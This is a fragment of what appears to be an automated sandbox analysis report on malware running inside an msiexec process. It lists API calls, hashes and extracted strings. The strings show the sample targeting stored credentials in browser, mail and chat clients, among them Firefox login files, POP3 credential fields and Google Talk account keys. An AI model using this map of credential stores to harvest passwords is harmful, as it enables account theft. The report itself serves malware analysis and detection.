                                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                              • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                              • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                            • memset.MSVCRT ref: 00408620
                                                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                            • memset.MSVCRT ref: 00408671
                                                                                            Strings
                                                                                            • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                                            • String ID: Software\Google\Google Talk\Accounts
                                                                                            • API String ID: 3996936265-1079885057
                                                                                            • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                            • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                            • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                            • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 448 40ceb2 446->448 449 40cea8-40ceb0 446->449 450 40cebd-40cecc _strcmpi 447->450 453 40ceb4-40ceb6 448->453 449->453 451 40ced3-40cedc call 40cdda 450->451 452 40cece-40ced1 450->452 454 40cede-40cef7 call 40c3d0 call 40ba28 451->454 458 40cf3f-40cf43 451->458 452->454 453->450 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->458
                                                                                            APIs
                                                                                              • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                            • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: strlen$_strcmpimemset
                                                                                            • String ID: /stext
                                                                                            • API String ID: 520177685-3817206916
                                                                                            • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                            • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                            • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                            • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                            APIs
                                                                                              • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                            • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                            • String ID:
                                                                                            • API String ID: 145871493-0
                                                                                            • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                            • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                            • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                            • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                            APIs
                                                                                            • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                              • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                              • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                              • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                            • String ID:
                                                                                            • API String ID: 4165544737-0
                                                                                            • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                            • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                            • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                            • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                            • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                            • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                            • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                            APIs
                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                            • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                            • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                            • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                            • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                            • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                            • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                            APIs
                                                                                            • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFind
                                                                                            • String ID:
                                                                                            • API String ID: 1863332320-0
                                                                                            • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                            • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                            • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                            • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                            • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                            • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                            • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                            • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                            • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                            • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                            • DeleteObject.GDI32(?), ref: 00401226
                                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                            • ShowWindow.USER32(00000000), ref: 00401253
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                            • ShowWindow.USER32(00000000), ref: 00401262
                                                                                            • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                            • memset.MSVCRT ref: 0040128E
                                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                            • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                            • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                            • String ID:
                                                                                            • API String ID: 2998058495-0
                                                                                            • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                            • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                            • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                            • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                            • API String ID: 633282248-1996832678
                                                                                            • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                            • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                            • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                            • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                            APIs
                                                                                              • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                              • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                              • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                              • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                              • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                              • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                            • strlen.MSVCRT ref: 0040F139
                                                                                            • strlen.MSVCRT ref: 0040F147
                                                                                            • memset.MSVCRT ref: 0040F187
                                                                                            • strlen.MSVCRT ref: 0040F196
                                                                                            • strlen.MSVCRT ref: 0040F1A4
                                                                                            • memset.MSVCRT ref: 0040F1EA
                                                                                            • strlen.MSVCRT ref: 0040F1F9
                                                                                            • strlen.MSVCRT ref: 0040F207
                                                                                            • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                            • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                            • API String ID: 2003275452-3138536805
                                                                                            • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                            • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                            • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                            • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                            • API String ID: 2449869053-232097475
                                                                                            • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                            • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                            • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                            • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                            APIs
                                                                                            • strchr.MSVCRT ref: 004100E4
                                                                                            • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                              • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                            • _mbscat.MSVCRT ref: 0041014D
                                                                                            • memset.MSVCRT ref: 00410129
                                                                                              • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                              • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                            • memset.MSVCRT ref: 00410171
                                                                                            • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                            • _mbscat.MSVCRT ref: 00410197
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                            • String ID: \systemroot
                                                                                            • API String ID: 912701516-1821301763
                                                                                            • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                            • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                            • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                            • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                            APIs
                                                                                              • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                            • strchr.MSVCRT ref: 0040327B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringstrchr
                                                                                            • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                            • API String ID: 1348940319-1729847305
                                                                                            • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                            • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                            • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                            • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                            • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                            • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                            • API String ID: 3510742995-3273207271
                                                                                            • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                            • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                            • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                            • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                            • API String ID: 1297977491-3883738016
                                                                                            • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                            • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                            • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                            • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040810E
                                                                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,00000000,679D7B60,?), ref: 004081B9
                                                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                            • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                            • API String ID: 524865279-2190619648
                                                                                            • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                            • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                            • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                            • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004091EC
                                                                                            • sprintf.MSVCRT ref: 00409201
                                                                                              • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                              • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                              • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                            • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                            • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                            • String ID: caption$dialog_%d
                                                                                            • API String ID: 2923679083-4161923789
